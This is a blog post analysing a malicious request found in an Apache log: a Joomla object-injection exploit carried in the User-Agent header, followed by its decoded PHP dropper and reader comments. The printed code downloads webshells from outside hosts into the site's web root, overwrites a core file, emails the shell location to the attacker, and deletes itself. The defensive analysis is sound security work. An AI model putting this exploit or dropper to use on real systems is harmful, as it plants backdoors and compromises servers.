Hmmm…what do we have here?

Screen Shot 2016-05-11 at 10.00.23 AM As you can probably see here with the screen shot of an Apache access log, and the overview shows something a bit off. All those individual lines peppered by those wide blocks there in the middle. They stand out like sore thumbs, don’t they?

Let’s take a closer look.

 

1×2.1×7.1×9.1×2 – – [11/May/2016:07:52:42 +0000] “GET /login HTTP/1.0” 200 3138 “-” “}__test|O:21:\”JDatabaseDriverMysqli\”:3:{s:2:\”fc\”;O:17:\”JSimplepieFactory\”:0:{}s:21:\”\\0\\0\\0disconnectHandlers\”;a:1:{i:0;a:2:{i:0;O:9:\”SimplePie\”:5:{s:8:\”sanitize\”;O:20:\”JDatabaseDriverMysql\”:0:{}s:8:\”feed_url\”;s:3738:\”eval(base64_decode(‘JGNoZWNrID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvbWVkaWEveHh4eC5waHAiIDsNCiRmcD1mb3BlbigiJGNoZWNrIiwidysiKTsNCmZ3cml0ZSgkZnAsYmFzZTY0X2RlY29kZSgnUEQ5d2FIQU5DbVoxYm1OMGFXOXVJR2gwZEhCZloyVjBLQ1IxY213cGV3MEtDU1JwYlNBOUlHTjFjbXhmYVc1cGRDZ2tkWEpzS1RzTkNnbGpkWEpzWDNObGRHOXdkQ2drYVcwc0lFTlZVa3hQVUZSZlVrVlVWVkpPVkZKQlRsTkdSVklzSURFcE93MEtDV04xY214ZmMyVjBiM0IwS0NScGJTd2dRMVZTVEU5UVZGOURUMDVPUlVOVVZFbE5SVTlWVkN3Z01UQXBPdzBLQ1dOMWNteGZjMlYwYjNCMEtDUnBiU3dnUTFWU1RFOVFWRjlHVDB4TVQxZE1UME5CVkVsUFRpd2dNU2s3RFFvSlkzVnliRjl6WlhSdmNIUW9KR2x0TENCRFZWSk1UMUJVWDBoRlFVUkZVaXdnTUNrN0RRb0pjbVYwZFhKdUlHTjFjbXhmWlhobFl5Z2thVzBwT3cwS0NXTjFjbXhmWTJ4dmMyVW9KR2x0S1RzTkNuME5DaVJqYUdWamF5QTlJQ1JmVTBWU1ZrVlNXeWRFVDBOVlRVVk9WRjlTVDA5VUoxMGdMaUFpTDIxbFpHbGhMMk56Y3k1d2FIQWlJRHNOQ2lSMFpYaDBJRDBnYUhSMGNGOW5aWFFvSjJoMGRIQTZMeTl0Y25SbkxuVnBMbkJvYVc1dFlTNWxaSFV1Y0dndlkyOXRjRzl1Wlc1MGN5OXFiMjl0YkdFdWRIaDBKeWs3RFFva2IzQmxiaUE5SUdadmNHVnVLQ1JqYUdWamF5d2dKM2NuS1RzTkNtWjNjbWwwWlNna2IzQmxiaXdnSkhSbGVIUXBPdzBLWm1Oc2IzTmxLQ1J2Y0dWdUtUc05DbWxtS0dacGJHVmZaWGhwYzNSektDUmphR1ZqYXlrcGV3MEtJQ0FnSUdWamFHOGdKR05vWldOckxpSThMMkp5UGlJN0RRcDlaV3h6WlNBTkNpQWdaV05vYnlBaWJtOTBJR1Y0YVhSeklqc05DbVZqYUc4Z0ltUnZibVVnTGx4dUlDSWdPdzBLSkdOb1pXTnJNaUE5SUNSZlUwVlNWa1ZTV3lkRVQwTlZUVVZPVkY5U1QwOVVKMTBnTGlBaUwyMWxaR2xoTDJwdFlXbHNMbkJvY0NJZ093MEtKSFJsZUhReUlEMGdhSFIwY0Y5blpYUW9KMmgwZEhBNkx5OXRjblJuTG5WcExuQm9hVzV0WVM1bFpIVXVjR2d2WTI5dGNHOXVaVzUwY3k5cWJXRnBiSG91ZEhoMEp5azdEUW9rYjNCbGJqSWdQU0JtYjNCbGJpZ2tZMmhsWTJzeUxDQW5keWNwT3cwS1puZHlhWFJsS0NSdmNHVnVNaXdnSkhSbGVIUXlLVHNOQ21aamJHOXpaU2drYjNCbGJqSXBPdzBLYVdZb1ptbHNaVjlsZUdsemRITW9KR05vWldOck1pa3BldzBLSUNBZ0lHVmphRzhnSkdOb1pXTnJNaTRpUEM5aWNqNGlPdzBLZldWc2MyVWdEUW9nSUdWamFHOGdJbTV2ZENCbGVHbDBjeklpT3cwS1pXTm9ieUFpWkc5dVpUSWdMbHh1SUNJZ093MEtEUW9rWTJobFkyc3pQU1JmVTBWU1ZrVlNXeWRFVDBOVlRVVk9WRjlTVDA5VUoxMGdMaUFpTDBndWFIUnRJaUE3RFFva2RHVjRkRE1nUFNCb2RIUndYMmRsZENnbkp5azdEUW9rYjNBelBXWnZjR1Z1S0NSamFHVmphek1zSUNkM0p5azdEUXBtZDNKcGRHVW9KRzl3TXl3a2RHVjRkRE1wT3cwS1ptTnNiM05sS0NSdmNETXBPdzBLRFFva1kyaGxZMnMwUFNSZlUwVlNWa1ZTV3lkRVQwTlZUVVZPVkY5U1QwOVVKMTBnTGlBaUwyMWxaR2xoTDJOb1pXTnJMbkJvY0NJZ093MEtKSFJsZUhRMElEMGdhSFIwY0Y5blpYUW9KMmgwZEhBNkx5OXRjblJuTG5WcExuQm9hVzV0WVM1bFpIVXVjR2d2WTI5dGNHOXVaVzUwY3k5eGNTNTBlSFFuS1RzTkNpUnZjRFE5Wm05d1pXNG9KR05vWldOck5Dd2dKM2NuS1RzTkNtWjNjbWwwWlNna2IzQTBMQ1IwWlhoME5DazdEUXBtWTJ4dmMyVW9KRzl3TkNrN0RRb05DaVJqYUdWamF6VTlKRjlUUlZKV1JWSmJKMFJQUTFWTlJVNVVYMUpQVDFRblhTQXVJQ0l2TDIxbFpHbGhMMnB0WVdsc2N5NXdhSEFpSURzTkNpUjBaWGgwTlNBOUlHaDBkSEJmWjJWMEtDZG9kSFJ3T2k4dmJYSjBaeTUxYVM1d2FHbHViV0V1WldSMUxuQm9MMk52YlhCdmJtVnVkSE12Y1hGNkxuUjRkQ2NwT3cwS0pHOXdOVDFtYjNCbGJpZ2tZMmhsWTJzMUxDQW5keWNwT3cwS1puZHlhWFJsS0NSdmNEVXNKSFJsZUhRMUtUc05DbVpqYkc5elpTZ2tiM0ExS1RzTkNnMEtKR05vWldOck5qMGtYMU5GVWxaRlVsc25SRTlEVlUxRlRsUmZVazlQVkNkZElDNGdJaTlzYVdKeVlYSnBaWE12YW05dmJXeGhMM05sYzNOcGIyNHZjMlZ6YzJsdmJpNXdhSEFpSURzTkNpUjBaWGgwTmlBOUlHaDBkSEJmWjJWMEtDZG9kSFJ3T2k4dmNHRnpkR1ZpYVc0dVkyOXRMM0poZHk5VlNFRkhWRGc0TnljcE93MEtKRzl3TmoxbWIzQmxiaWdrWTJobFkyczJMQ0FuZHljcE93MEtabmR5YVhSbEtDUnZjRFlzSkhSbGVIUTJLVHNOQ21aamJHOXpaU2drYjNBMktUc05DZzBLSkhSdmVpQTlJQ0lpT3cwS0pITjFZbXBsWTNRZ1BTQW5TbTl0SUhwNmVpQW5JQzRnSkY5VFJWSldSVkpiSjFORlVsWkZVbDlPUVUxRkoxMDdEUW9rYUdWaFpHVnlJRDBnSjJaeWIyMDZJRXRsYTJ0aGFTQlRaVzV6Wlc0Z1BIWnZibEpsYVc1b1pYSjZTMnhoZFhOQVUyRnBhMjkxYm1GSWFXSnBMbU52YlQ0bklDNGdJbHh5WEc0aU93MEtKRzFsYzNOaFoyVWdQU0FpVTJobGJHeDZJRG9nYUhSMGNEb3ZMeUlnTGlBa1gxTkZVbFpGVWxzblUwVlNWa1ZTWDA1QlRVVW5YU0F1SUNJdmJHbGljbUZ5YVdWekwycHZiMjFzWVM5cWJXRnBiQzV3YUhBL2RTSWdMaUFpWEhKY2JpSWdMaUJ3YUhCZmRXNWhiV1VvS1NBdUlDSmNjbHh1SWpzTkNpUnpaVzUwYldGcGJDQTlJRUJ0WVdsc0tDUjBiM29zSUNSemRXSnFaV04wTENBa2JXVnpjMkZuWlN3Z0pHaGxZV1JsY2lrN0RRb05Da0IxYm14cGJtc29YMTlHU1V4RlgxOHBPdzBLRFFvTkNqOCsnKSk7DQpmY2xvc2UoJGZwKTs=’));JFactory::getConfig();exit\”;s:19:\”cache_name_function\”;s:6:\”assert\”;s:5:\”cache\”;b:1;s:11:\”cache_class\”;O:20:\”JDatabaseDriverMysql\”:0:{}}i:1;s:4:\”init\”;}}s:13:\”\\0\\0\\0connection\”;b:1;}\xf0\xfd\xfd\xfd” vhost=ala.devcloud.acquia-sites.com host=www.website.org hosting_site=ala pid=1219 request_time=158579 request_id=”v-578582fe-174d-11e6-a036-22000a1e875f”

Someone is sending a large block of data into my server. Let’s take a closer look.

Using <?php echo base64_decode(‘allthatcrap’); ?> I get:

$check = $_SERVER[‘DOCUMENT_ROOT’] . “/media/xxxx.php” ;
$fp=fopen(“$check”,”w+”);
fwrite($fp,base64_decode(‘PD9waHANCmZ1bmN0aW9uIGh0dHBfZ2V0KCR1cmwpew0KCSRpbSA9IGN1cmxfaW5pdCgkdXJsKTsNCgljdXJsX3NldG9wdCgkaW0sIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOw0KCWN1cmxfc2V0b3B0KCRpbSwgQ1VSTE9QVF9DT05ORUNUVElNRU9VVCwgMTApOw0KCWN1cmxfc2V0b3B0KCRpbSwgQ1VSTE9QVF9GT0xMT1dMT0NBVElPTiwgMSk7DQoJY3VybF9zZXRvcHQoJGltLCBDVVJMT1BUX0hFQURFUiwgMCk7DQoJcmV0dXJuIGN1cmxfZXhlYygkaW0pOw0KCWN1cmxfY2xvc2UoJGltKTsNCn0NCiRjaGVjayA9ICRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiAiL21lZGlhL2Nzcy5waHAiIDsNCiR0ZXh0ID0gaHR0cF9nZXQoJ2h0dHA6Ly9tcnRnLnVpLnBoaW5tYS5lZHUucGgvY29tcG9uZW50cy9qb29tbGEudHh0Jyk7DQokb3BlbiA9IGZvcGVuKCRjaGVjaywgJ3cnKTsNCmZ3cml0ZSgkb3BlbiwgJHRleHQpOw0KZmNsb3NlKCRvcGVuKTsNCmlmKGZpbGVfZXhpc3RzKCRjaGVjaykpew0KICAgIGVjaG8gJGNoZWNrLiI8L2JyPiI7DQp9ZWxzZSANCiAgZWNobyAibm90IGV4aXRzIjsNCmVjaG8gImRvbmUgLlxuICIgOw0KJGNoZWNrMiA9ICRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiAiL21lZGlhL2ptYWlsLnBocCIgOw0KJHRleHQyID0gaHR0cF9nZXQoJ2h0dHA6Ly9tcnRnLnVpLnBoaW5tYS5lZHUucGgvY29tcG9uZW50cy9qbWFpbHoudHh0Jyk7DQokb3BlbjIgPSBmb3BlbigkY2hlY2syLCAndycpOw0KZndyaXRlKCRvcGVuMiwgJHRleHQyKTsNCmZjbG9zZSgkb3BlbjIpOw0KaWYoZmlsZV9leGlzdHMoJGNoZWNrMikpew0KICAgIGVjaG8gJGNoZWNrMi4iPC9icj4iOw0KfWVsc2UgDQogIGVjaG8gIm5vdCBleGl0czIiOw0KZWNobyAiZG9uZTIgLlxuICIgOw0KDQokY2hlY2szPSRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiAiL0guaHRtIiA7DQokdGV4dDMgPSBodHRwX2dldCgnJyk7DQokb3AzPWZvcGVuKCRjaGVjazMsICd3Jyk7DQpmd3JpdGUoJG9wMywkdGV4dDMpOw0KZmNsb3NlKCRvcDMpOw0KDQokY2hlY2s0PSRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiAiL21lZGlhL2NoZWNrLnBocCIgOw0KJHRleHQ0ID0gaHR0cF9nZXQoJ2h0dHA6Ly9tcnRnLnVpLnBoaW5tYS5lZHUucGgvY29tcG9uZW50cy9xcS50eHQnKTsNCiRvcDQ9Zm9wZW4oJGNoZWNrNCwgJ3cnKTsNCmZ3cml0ZSgkb3A0LCR0ZXh0NCk7DQpmY2xvc2UoJG9wNCk7DQoNCiRjaGVjazU9JF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvL21lZGlhL2ptYWlscy5waHAiIDsNCiR0ZXh0NSA9IGh0dHBfZ2V0KCdodHRwOi8vbXJ0Zy51aS5waGlubWEuZWR1LnBoL2NvbXBvbmVudHMvcXF6LnR4dCcpOw0KJG9wNT1mb3BlbigkY2hlY2s1LCAndycpOw0KZndyaXRlKCRvcDUsJHRleHQ1KTsNCmZjbG9zZSgkb3A1KTsNCg0KJGNoZWNrNj0kX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddIC4gIi9saWJyYXJpZXMvam9vbWxhL3Nlc3Npb24vc2Vzc2lvbi5waHAiIDsNCiR0ZXh0NiA9IGh0dHBfZ2V0KCdodHRwOi8vcGFzdGViaW4uY29tL3Jhdy9VSEFHVDg4NycpOw0KJG9wNj1mb3BlbigkY2hlY2s2LCAndycpOw0KZndyaXRlKCRvcDYsJHRleHQ2KTsNCmZjbG9zZSgkb3A2KTsNCg0KJHRveiA9ICIiOw0KJHN1YmplY3QgPSAnSm9tIHp6eiAnIC4gJF9TRVJWRVJbJ1NFUlZFUl9OQU1FJ107DQokaGVhZGVyID0gJ2Zyb206IEtla2thaSBTZW5zZW4gPHZvblJlaW5oZXJ6S2xhdXNAU2Fpa291bmFIaWJpLmNvbT4nIC4gIlxyXG4iOw0KJG1lc3NhZ2UgPSAiU2hlbGx6IDogaHR0cDovLyIgLiAkX1NFUlZFUlsnU0VSVkVSX05BTUUnXSAuICIvbGlicmFyaWVzL2pvb21sYS9qbWFpbC5waHA/dSIgLiAiXHJcbiIgLiBwaHBfdW5hbWUoKSAuICJcclxuIjsNCiRzZW50bWFpbCA9IEBtYWlsKCR0b3osICRzdWJqZWN0LCAkbWVzc2FnZSwgJGhlYWRlcik7DQoNCkB1bmxpbmsoX19GSUxFX18pOw0KDQoNCj8+’));

So, looking for a file xxxx.php in the media directory, are we?

Let’s decode the rest of the package.

 

function http_get($url){
$im = curl_init($url);
curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($im, CURLOPT_HEADER, 0);
return curl_exec($im);
curl_close($im);
}
$check = $_SERVER[‘DOCUMENT_ROOT’] . “/media/css.php” ;
$text = http_get(‘http://mrtg.ui.phinma.edu.ph/components/joomla.txt&#8217;);
$open = fopen($check, ‘w’);
fwrite($open, $text);
fclose($open);
if(file_exists($check)){
echo $check.””;
}else
echo “not exits”;
echo “done .\n ” ;
$check2 = $_SERVER[‘DOCUMENT_ROOT’] . “/media/jmail.php” ;
$text2 = http_get(‘http://mrtg.ui.phinma.edu.ph/components/jmailz.txt&#8217;);
$open2 = fopen($check2, ‘w’);
fwrite($open2, $text2);
fclose($open2);
if(file_exists($check2)){
echo $check2.””;
}else
echo “not exits2”;
echo “done2 .\n ” ;

$check3=$_SERVER[‘DOCUMENT_ROOT’] . “/H.htm” ;
$text3 = http_get(”);
$op3=fopen($check3, ‘w’);
fwrite($op3,$text3);
fclose($op3);

$check4=$_SERVER[‘DOCUMENT_ROOT’] . “/media/check.php” ;
$text4 = http_get(‘http://mrtg.ui.phinma.edu.ph/components/qq.txt&#8217;);
$op4=fopen($check4, ‘w’);
fwrite($op4,$text4);
fclose($op4);

$check5=$_SERVER[‘DOCUMENT_ROOT’] . “//media/jmails.php” ;
$text5 = http_get(‘http://mrtg.ui.phinma.edu.ph/components/qqz.txt&#8217;);
$op5=fopen($check5, ‘w’);
fwrite($op5,$text5);
fclose($op5);

$check6=$_SERVER[‘DOCUMENT_ROOT’] . “/libraries/joomla/session/session.php” ;
$text6 = http_get(‘http://pastebin.com/raw/UHAGT887&#8217;);
$op6=fopen($check6, ‘w’);
fwrite($op6,$text6);
fclose($op6);

$toz = “”;
$subject = ‘Jom zzz ‘ . $_SERVER[‘SERVER_NAME’];
$header = ‘from: Kekkai Sensen <vonReinherzKlaus@SaikounaHibi.com>’ . “\r\n”;
$message = “Shellz : http://&#8221; . $_SERVER[‘SERVER_NAME’] . “/libraries/joomla/jmail.php?u” . “\r\n” . php_uname() . “\r\n”;
$sentmail = @mail($toz, $subject, $message, $header);

@unlink(__FILE__);

Well, well, well…looking to hack a Joomla site, huh?

Anyway…nothing to see here folks. No Joomla site….but watch the logs!

Advertisements

3 thoughts on “Hmmm…what do we have here?

  1. c1ph3r says:

    Well, I just got the same log on my server.. 🙂 And that two times, one time from 192.187.114.11, the second time from 142.54.167.98…
    Btw, the server of ‘http://mrtg.ui.phinma.edu.ph/components/qq.txt’ stays in the philippines 😉

  2. Andrew house says:

    Hey, after following promps while accessing a government website for legitimate reasons regarding me trying to keep my six year old son safe from his mother I have ended up here due to ‘unsafe connection’. Can u help me prove my phone keeps getting hacked?

    • michalsen says:

      Andrew, I am sorry, but I am not sure how you wound up on this blog. From your comment I gather you were attempting to connect to a server that had an invalid SSL cert and your browser gave a warning, and then maybe routed to a search query where this blog post was listed? It wouldn’t surprise me to know a government website had an invalid SSL
      With as little information as I have I can not venture to guess what is happening with your phone, but the ‘unsafe connection’ most likely is coming from a server you are attempting to connect to, and not your phone.
      I hope some of this helps.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s